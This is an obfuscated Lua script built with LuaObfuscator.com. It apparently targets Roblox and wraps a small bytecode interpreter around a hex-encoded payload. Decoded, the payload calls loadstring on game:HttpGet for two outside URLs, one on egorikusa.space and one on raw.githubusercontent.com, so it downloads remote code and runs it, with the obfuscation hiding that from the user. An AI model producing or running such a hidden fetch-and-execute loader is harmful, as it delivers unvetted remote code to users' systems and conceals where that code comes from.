--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v90=v5(v82,v19);v19=nil;return v90;else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((5 -3)^(v32-((1 + 1) -(878 -(282 + 595))))))%(2^(((v33-1) -(v32-1)) + (1 -0))) ;return v83-(v83%(2 -1)) ;else local v84=619 -(555 + 64) ;local v85;while true do if (v84==(931 -(857 + 74))) then v85=(1639 -(1523 + 114))^(v32-(569 -(367 + 201))) ;return (((v31%(v85 + v85))>=v85) and ((834 + 94) -(214 + 713))) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (v35==((1045 + 21) -(68 + 997))) then return (v37 * 256) + v36 ;end if (v35==0) then v36,v37=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;v35=118 -(32 + 85) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (351 -(87 + 263)) + 2 );v18=v18 + (961 -(892 + 65)) ;return (v41 * (40022563 -23245347)) + (v40 * (121138 -55602)) + (v39 * (469 -213)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=181 -((858 -(368 + 423)) + 113) ;local v45=(v20(v43,1 + (0 -0) ,49 -29 ) * (2^(24 + 8))) + v42 ;local v46=v20(v43,83 -62 ,983 -(802 + 150) );local v47=((v20(v43,85 -53 )==(1 -0)) and  -(1 + 0)) or 1 ;if (v46==(997 -(915 + 82))) then if (v45==0) then return v47 * (0 -0) ;else v46=1 + (18 -(10 + 8)) ;v44=0 -0 ;end elseif (v46==(3234 -(1069 + 118))) then return ((v45==(0 -0)) and (v47 * ((3 -2)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(178 + 845) ) * (v44 + (v45/(((445 -(416 + 26)) -(3 -2))^(52 + 0)))) ;end local function v25(v48) local v49;if  not v48 then local v86=0 + 0 ;while true do if (v86==(0 -0)) then v48=v23();if (v48==(438 -(145 + 293))) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v65=431 -(44 + 386) , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v67=(function() return 1262 -(1091 + 171) ;end)();while true do if (v67==1) then if (v51==(0 + 0)) then local v96=(function() return 0 -0 ;end)();local v97=(function() return;end)();while true do if (v96==0) then v97=(function() return 0 -0 ;end)();while true do if (v97==1) then v54=(function() return {};end)();v55=(function() return {};end)();v97=(function() return 376 -(123 + 251) ;end)();end if (v97==2) then v51=(function() return 4 -3 ;end)();break;end if (v97~=0) then else v52=(function() return function(v152,v153,v154) local v155=(function() return 698 -(208 + 490) ;end)();while true do if (v155==0) then local v169=(function() return 0;end)();local v170=(function() return;end)();while true do if (v169==0) then v170=(function() return 0;end)();while true do if (v170~=(0 + 0)) then else local v179=(function() return 0 + 0 ;end)();while true do if ((836 -(660 + 176))~=v179) then else v152[v153-#"!" ]=(function() return v154();end)();return v152,v153,v154;end end end end break;end end end end end;end)();v53=(function() return {};end)();v97=(function() return 1;end)();end end break;end end end break;end if (v67~=(0 + 0)) then else local v91=(function() return 0;end)();while true do if (v91==0) then if (1==v51) then local v98=(function() return 202 -(14 + 188) ;end)();local v99=(function() return;end)();while true do if ((675 -(534 + 141))==v98) then v99=(function() return 0 + 0 ;end)();while true do if (v99~=(2 + 0)) then else v51=(function() return 2;end)();break;end if (v99~=0) then else v56=(function() return {v53,v54,nil,v55};end)();v57=(function() return v23();end)();v99=(function() return 1;end)();end if (v99==1) then v58=(function() return {};end)();for v161= #"[",v57 do local v162=(function() return 0 + 0 ;end)();local v163=(function() return;end)();local v164=(function() return;end)();local v165=(function() return;end)();while true do if (v162==(0 -0)) then v163=(function() return 0 -0 ;end)();v164=(function() return nil;end)();v162=(function() return 1;end)();end if (v162~=1) then else v165=(function() return nil;end)();while true do if (v163==0) then local v176=(function() return 0;end)();while true do if (v176~=1) then else v163=(function() return 2 -1 ;end)();break;end if (v176~=(0 + 0)) then else v164=(function() return v21();end)();v165=(function() return nil;end)();v176=(function() return 1;end)();end end end if (1~=v163) then else if (v164== #",") then v165=(function() return v21()~=(0 + 0) ;end)();elseif (v164==2) then v165=(function() return v24();end)();elseif (v164== #"gha") then v165=(function() return v25();end)();end v58[v161]=(function() return v165;end)();break;end end break;end end end v99=(function() return 398 -(115 + 281) ;end)();end end break;end end end if (v51~=(4 -2)) then else v56[ #"gha"]=(function() return v21();end)();for v101= #" ",v23() do local v102=(function() return v21();end)();if (v20(v102, #"!", #"!")==(0 + 0)) then local v126=(function() return 0;end)();local v127=(function() return;end)();local v128=(function() return;end)();local v129=(function() return;end)();while true do if (v126~=1) then else local v156=(function() return 0;end)();while true do if (v156==(0 -0)) then v129=(function() return {v22(),v22(),nil,nil};end)();if (v127==0) then local v174=(function() return 867 -(550 + 317) ;end)();local v175=(function() return;end)();while true do if (v174==(0 -0)) then v175=(function() return 0 -0 ;end)();while true do if (v175==0) then v129[ #"19("]=(function() return v22();end)();v129[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v127== #",") then v129[ #"91("]=(function() return v23();end)();elseif (v127==2) then v129[ #"xnx"]=(function() return v23() -(2^16) ;end)();elseif (v127~= #"asd") then else local v184=(function() return 0 -0 ;end)();while true do if (v184==0) then v129[ #"-19"]=(function() return v23() -((287 -(134 + 151))^(1681 -(970 + 695))) ;end)();v129[ #"0836"]=(function() return v22();end)();break;end end end v156=(function() return 1 -0 ;end)();end if (1~=v156) then else v126=(function() return 2;end)();break;end end end if (v126==(1990 -(582 + 1408))) then v127=(function() return v20(v102,2, #"xnx");end)();v128=(function() return v20(v102, #"http",6);end)();v126=(function() return 3 -2 ;end)();end if ((2 -0)==v126) then if (v20(v128, #"\\", #"~")== #"{") then v129[2]=(function() return v58[v129[2]];end)();end if (v20(v128,2,2)== #"~") then v129[ #"xxx"]=(function() return v58[v129[ #"-19"]];end)();end v126=(function() return 11 -8 ;end)();end if (v126==3) then if (v20(v128, #"91(", #"gha")== #"[") then v129[ #"asd1"]=(function() return v58[v129[ #"?id="]];end)();end v53[v101]=(function() return v129;end)();break;end end end end for v103= #"|",v23() do v54,v103,v28=(function() return v52(v54,v103,v28);end)();end return v56;end v91=(function() return 1825 -(1195 + 629) ;end)();end if ((1 -0)==v91) then v67=(function() return 242 -(187 + 54) ;end)();break;end end end end end end local function v29(v59,v60,v61) local v62=v59[781 -(162 + 618) ];local v63=v59[(582 -(361 + 219)) + 0 ];local v64=v59[2 + 1 ];return function(...) local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=1 -0 ;local v73= -(1 -0);local v74={};local v75={...};local v76=v12("#",...) -(1637 -((1693 -(53 + 267)) + 60 + 203)) ;local v77={};local v78={};for v87=1000 -(451 + 549) ,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 + 0 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[414 -(15 + 398) ];if (v81<=(15 -5)) then if (v81<=(6 -2)) then if ((v81<=(1385 -(746 + 638))) or (4795<1407)) then if (v81==(0 + 0)) then local v104=v80[2];local v105=v78[v80[4 -1 ]];v78[v104 + (342 -(218 + 123)) ]=v105;v78[v104]=v105[v80[1585 -(1535 + 46) ]];else for v119=v80[2 + 0 ],v80[1 + 2 ] do v78[v119]=nil;end end elseif (v81<=(562 -(306 + 254))) then if (v78[v80[984 -(18 + 964) ]]==v80[1 + 3 ]) then v72=v72 + (1 -0) ;else v72=v80[1470 -(899 + 568) ];end elseif (v81==(2 + 1)) then local v131=v80[4 -2 ];local v132=v78[v80[606 -(268 + 335) ]];v78[v131 + (291 -(60 + 230)) ]=v132;v78[v131]=v132[v80[576 -(426 + (549 -403)) ]];else v78[v80[1 + 1 ]]();end elseif (v81<=(1463 -(282 + 1174))) then if ((1853<4813) and (v81<=(816 -(569 + 242)))) then if ((v78[v80[2]]==v80[11 -7 ]) or (2821<2431)) then v72=v72 + 1 + 0 ;else v72=v80[1027 -(409 + 297 + 318) ];end elseif ((v81==((792 + 465) -(721 + 530))) or (2874<2181)) then local v137=1271 -((1795 -(20 + 830)) + 326) ;local v138;local v139;local v140;local v141;while true do if ((v137==(4 -2)) or (2689<=343)) then for v166=v138,v73 do v141=v141 + 1 + 0 + 0 ;v78[v166]=v139[v141];end break;end if (v137==(700 -(271 + 429))) then v138=v80[(128 -(116 + 10)) + 0 ];v139,v140=v71(v78[v138](v13(v78,v138 + (1501 -(1408 + 7 + 85)) ,v80[(1827 -(542 + 196)) -(461 + 625) ])));v137=1;end if ((1289 -(993 + 295))==v137) then v73=(v140 + v138) -(1 + 0) ;v141=(2509 -1338) -(418 + 753) ;v137=1 + 1 ;end end else do return;end end elseif ((v81<=(1 + 7)) or (1869==2009)) then v78[v80[1 + 0 + 1 ]]=v61[v80[1 + 2 ]];elseif ((v81>(538 -(406 + 123))) or (3546<2322)) then v78[v80[1771 -(1749 + 20) ]]();else v78[v80[1 + 1 ]]=v80[(674 + 651) -(1249 + 73) ];end elseif (v81<=15) then if ((v81<=(5 + 7)) or (2082==4773)) then if (v81==(1156 -(466 + 679))) then v78[v80[2]]=v80[6 -3 ];else local v113=v80[(2 + 3) -3 ];local v114,v115=v71(v78[v113](v13(v78,v113 + (1901 -(106 + 1794)) ,v80[1 + 2 ])));v73=(v115 + v113) -(1 + 0) ;local v116=0 -(0 -0) ;for v121=v113,v73 do v116=v116 + 1 ;v78[v121]=v114[v116];end end elseif (v81<=(34 -21)) then v78[v80[2]]=v80[117 -((9 -5) + 110) ]~=(584 -(57 + 527)) ;elseif ((3244>1055) and (v81==14)) then v72=v80[(2981 -(1126 + 425)) -(41 + 1386) ];else v78[v80[105 -(17 + 86) ]]=v61[v80[3 + 0 ]];end elseif (v81<=(39 -21)) then if (v81<=(46 -30)) then v72=v80[3];elseif (v81>(183 -(122 + (449 -(118 + 287))))) then do return;end else local v147=v80[2 -0 ];v78[v147]=v78[v147](v13(v78,v147 + (3 -2) ,v73));end elseif (v81<=19) then for v124=v80[2 + 0 ],v80[1 + 2 ] do v78[v124]=nil;end elseif (v81>(40 -20)) then v78[v80[2]]=v80[68 -(30 + 35) ]~=0 ;else local v150=0 + 0 ;local v151;while true do if (((1257 -(1043 + 214))==v150) or (3313<=1778)) then v151=v80[7 -(19 -14) ];v78[v151]=v78[v151](v13(v78,v151 + (1213 -(323 + 889)) ,v73));break;end end end v72=v72 + ((1123 -(118 + 1003)) -1) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063O00028O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403343O00682O7470733A2O2F65676F72696B7573612E73706163652F6134352O62632O34663462636237653739316338346531382E6C7561033D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F536C61646B79707570732O672F336234632F6D61696E2F34633362001C3O0012093O00014O0001000100013O0026053O0002000100010004103O00020001001209000100013O00260500010005000100010004103O0005000100120F000200023O00120F000300033O002003000300030004001209000500054O0015000600014O0006000300064O001100023O00022O000A00020001000100120F000200023O00120F000300033O002003000300030004001209000500064O0015000600014O0006000300064O001100023O00022O000A0002000100010004103O001B00010004103O000500010004103O001B00010004103O000200012O00073O00017O00",v9(),...);